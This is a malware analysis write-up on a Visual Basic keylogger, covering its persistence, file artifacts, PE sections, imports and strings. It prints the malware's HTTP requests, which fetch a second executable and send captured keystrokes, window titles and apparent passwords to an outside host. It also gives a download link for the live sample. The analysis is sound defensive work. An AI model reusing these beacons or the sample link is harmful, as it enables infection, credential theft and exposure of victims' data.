Description

Summary

• This malware has been written in VisualBasic (VB)
• It achieves persistence by adding an entry in the startup registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Run\System32)
• It attempts to get another executable (habeys.exe) from www.hoarafushionline.net

Identification

Antivirus detection

Links

• Virustotal: https://www.virustotal.com/en/file/062ca7b27c517f9449d5d2e6eeecaf9a1aab467f177754651f0998bcc55af98f/analysis/1397130248/
• Malwr anlysis: https://malwr.com/analysis/N2MyYjJiMTRlN2ExNDhkOTkyNjBlNTZmZTk4NjM0OWE/
• Download link: https://www.dropbox.com/s/k5rlu46wxlaufye/607408678014f9d5c3d6aba4572db018.zip (pass: infected)

Artifacts

Persistence

The malware achieves persistence by adding the following registry key:

Note

The value in yellow is replaced by the username of the logged in user.

Reset hidden files and file extensions visibility

The malware attempts to hide itself by resetting the hidden files and extensions explorer options:

Files

The malware copies itself to

%ALLUSERSPROFILE%\Application Data\%username%.exe

Following encrypted file is also generated:

%homepath%\Local Settings\Temp\~DFBAE.tmp

Mutexes

INCOMPLETE SECTION OR ARTICLE

This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Network indicators

The malware attempts to gather another executable from www.hoarafushionline.net but since the website is dead, we haven't been able to analyze this file.

GET /habeys.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: www.hoarafushionline.net
Connection: Keep-Alive

It seems that an infected machine also sends such requests:

GET http://www.hoarafushionline.net/extract.php?x=?v....%20%20*****%20%2009-04-2014/09:19:55%20||%20%20:%20%20--%20.%20%20*****%20%2009-04-2014/09:19:57%20||%20Microsoft%20PowerPoint%20-%20[TT%20Doubles%20Fixtures%20[Compatibility%20Mode]]%20:%20%20--%20?b...?ac[%20%20*****%20%2009-04-2014/09:20:34%20||%20%20:%20%20--%20..%20%20*****%20%2009-04-2014/09:20:36%20||%20NotesLogo%20:%20%20--%20..?Passw123%20%20*****%20%20%20%20*****%20%2009-04-2014/09:20:42%20||%20Workspace%20-%20IBM%20Lotus%20Notes%20:%20%20--%20.%20%20*****%20%2009-04-2014/09:20:50%20||%20Mail%20-%20IBM%20Lotus%20Notes%20:%20%20--%20.%20%20*****%20%2009-04-2014/09:20:57%20||%20New%20Message%20-%20IBM%20Lotus%20Notes%20:%20%20--%20..?Hi%20.?William?%20%20*****%20%20%20%20*****%20%20%20%20*****%20%20..?From%20.?Sprts%20committee%20.'o..%20%20*****%20%2009-04-2014/09:21:39%20||%20Registry%20Optimizer%20:%20%20--%20or.id?%20send%20a%20reminder%20to%20all%20these%20players%20for%20todays.?s%20match.%20.?TT%20.?Double?s.%20and%20keep%20ur%20committee%20members%20in%20cc%20%20*****%20%20%20%20*****%20%20.?v..?TT%20.?Doun.ble?s%20reminder.diwakar..%20%20*****%20%2009-04-2014/09:23:20%20||%20TT%20Double's%20reminder%20-%20IBM%20Lotus%20Notes%20:%20%20--%20..%20%20*****%20%2009-04-2014/09:23:33%20||%20IBM%20Lotus%20Notes%20:%20%20--%20.%20%20*****%20%2009-04-2014/09:23:33%20||%20Mail%20-%20Inbox%20-%20IBM%20Lotus%20Notes%20:%20%20--%20.%20%20*****%20%2009-04-2014/09:23:36%20||%20Mail%20-%20Inbox%20-%20IBM%20Lotus%20Notes%20:%20%20--%20.%20%20*****%20%2009-04-2014/09:23:40%20||%20%20:%20%20--%20.gladiator17%20%20*****%20%20.&ip=10.0.0.41&un=USER4562&exe=5372 HTTP/1.1
User-Agent: VB OpenUrl
Host: www.hoarafushionline.net
Pragma: no-cache
Cookie: vsid=914vr1432639559823845; _sm_au_d=1

Static Analysis

Version information

Translation: 0x0409 0x04b0
InternalName: APS
FileVersion: 1.00
CompanyName: Microsoft
ProductName: ysp
ProductVersion: 1.00
FileDescription: Photo
OriginalFilename: APS.exe

Sections

Name       VirtAddr     VirtSize     RawSize      Entropy     
--------------------------------------------------------------------------------
.text      0x1000       0xa44c       0xb000       4.796745    
.data      0xc000       0xc68        0x0          0.000000    [SUSPICIOUS]
.rsrc      0xd000       0xe000       0xe000       4.552983    
xabofet    0x1b000      0x1000       0x0          0.000000    [SUSPICIOUS]

Resources

Name               RVA      Size     Lang         Sublang                  Type
--------------------------------------------------------------------------------
RT_ICON            0x1309c  0x668    LANG_NEUTRAL SUBLANG_NEUTRAL          empty
RT_ICON            0x12db4  0x2e8    LANG_NEUTRAL SUBLANG_NEUTRAL          empty
RT_ICON            0x12c8c  0x128    LANG_NEUTRAL SUBLANG_NEUTRAL          empty
RT_ICON            0x11de4  0xea8    LANG_NEUTRAL SUBLANG_NEUTRAL          empty
RT_ICON            0x1153c  0x8a8    LANG_NEUTRAL SUBLANG_NEUTRAL          empty
RT_ICON            0x10fd4  0x568    LANG_NEUTRAL SUBLANG_NEUTRAL          GLS_BINARY_LSB_FIRST
RT_ICON            0xea2c   0x25a8   LANG_NEUTRAL SUBLANG_NEUTRAL          data
RT_ICON            0xd984   0x10a8   LANG_NEUTRAL SUBLANG_NEUTRAL          data
RT_ICON            0xd51c   0x468    LANG_NEUTRAL SUBLANG_NEUTRAL          GLS_BINARY_LSB_FIRST
RT_GROUP_ICON      0xd498   0x84     LANG_NEUTRAL SUBLANG_NEUTRAL          MS Windows icon resource - 9 icons, 48x48, 16-colors
RT_VERSION         0xd270   0x228    LANG_ENGLISH SUBLANG_ENGLISH_US       data

IAT

MSVBVM60.dll

• MethCallEngine
• rtcLowerCaseVar
• rtcTrimBstr
• rtcMsgBox
• rtcMidCharBstr
• rtcMidCharVar
• rtcSpaceBstr
• rtcSpaceVar
• EVENT_SINK_AddRef
• DllFunctionCall
• EVENT_SINK_Release
• EVENT_SINK_QueryInterface
• __vbaExceptHandler
• rtcReplace
• rtcVarBstrFromAnsi
• ProcCallEngine
• rtcStrFromVar
• rtcFileCopy
• ThunRTMain
• rtcGetDateVar
• rtcGetTimeVar
• rtcLeftCharBstr
• rtcLeftCharVar

Strings

&.ED
frmMain
My YPS  - KeyLogger
333;
333;
333;
333;
333;
333;
333;
3330
3333
3330
3333
3330
33333
}}}}
~}}}}
RTVVjrqmjr}
~}}}}
!/9?NGGaaq^^^m
~~}}}
+388<<a^^^^]^
#%88<Ca[]]]]]
#%CCZ[^\\\]
#%<[[^^\\]
#%<_a[^^^\^
#%<<aa^^^^^
##<_am^m^^m
"%%8D<aabm^^m
#-8<Iaammmmm
"#%89addammmr
$-8<Gdnmmmj
$-8GIdnnjrr
$-8GGhnsrr}
$-9Gdhnszz
$-9GGggs}s
+-9Ghgys
$1;GVvys
+/GSiiyy
+/?Tiv
 +1AV
,?NYi
 ,6RT
!,6R
+.?R
+5AR
!.6RY
+/NR
-6RR
+6NR
$4?R
uwxz.4DC\JJMU
'*  KJJJ;t
mojj
 99MJJBy
  9KJJJ\
9#KMJJ\
  =LMOO`
*1=R\QQc
*<=UUQ\h
*@@VU```g
2@CVVg`m
'2FCaccm
3F[Yam
(3H[a
7F:+%
>NF:+
>RNF:
AYRNF
21!i%
A]YRN
442i#
S`]YR
%@74i%
Sb`]g
(J@@=%
Tcb`j
:TOJ7Q
Tccbk 
:]XX7
Vcccl#
<^]Y7
Vcccl),Fbb_:
Vccll7,bheb:
Vcj[S/dhhhbH
_VTTTPJJJBH
#MgR'Qj.(Vq
 Lhh(QjT/SiB3Sh'5Ti
Lit%Qla-TkM3Ti>5Sf85Qd(6Rf
Liz$Qli,UmU2VlD5Ti:5Rf55Qd1Y
Li|#Qmo+Un\Fs
%Jc_(Nf/)Sl
Hc}(Nfg1QfL4Qd%5Th
%Mgr.RhY4RfE5Qd:f
*>FE
*>EP
Form1
Timer3
Timer1
&.ED
VB5!
frmMain
Module1
&.ED
>dc^
Timer3
C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Form
Timer1
user32
GetKeyState
GetAsyncKeyState
GetActiveWindow
GetForegroundWindow
GetWindowTextA
GetWindowTextLengthA
wininet.dll
InternetGetConnectedStateEx
InternetOpenUrlA
InternetOpenA
kernel32
CopyFileA
GetSystemDirectoryA
advapi32.dll
RegCreateKeyA
RegSetValueExA
RegCloseKey
kernel32.dll
SetFileAttributesA
GetDriveTypeA
RegOpenKeyA
FindFirstFileA
GetUserNameA
RegOpenKeyExA
GetCurrentProcessId
DeleteFileA
OpenFile
shell32.dll
ShellExecuteA
urlmon
URLDownloadToFileA
SetRegistryValue
sysPath
CheckInternetConnection
GetActiveTitle
WSOCK32.DLL
WSAGetLastError
WSAStartup
WSACleanup
gethostname
gethostbyname
RtlMoveMemory
GetCurrentProcess
GetCurrentThread
GetCurrentThreadId
SetThreadPriority
GetThreadPriority
GetWindowThreadProcessId
OpenProcess
SetPriorityClass
GetPriorityClass
CloseHandle
SHGetSpecialFolderPathA
VBA6.DLL
hKey
KeyName
ValueName
value
MSVBVM60.DLL
MethCallEngine
EVENT_SINK_AddRef
DllFunctionCall
EVENT_SINK_Release
EVENT_SINK_QueryInterface
__vbaExceptHandler
ProcCallEngine

Comments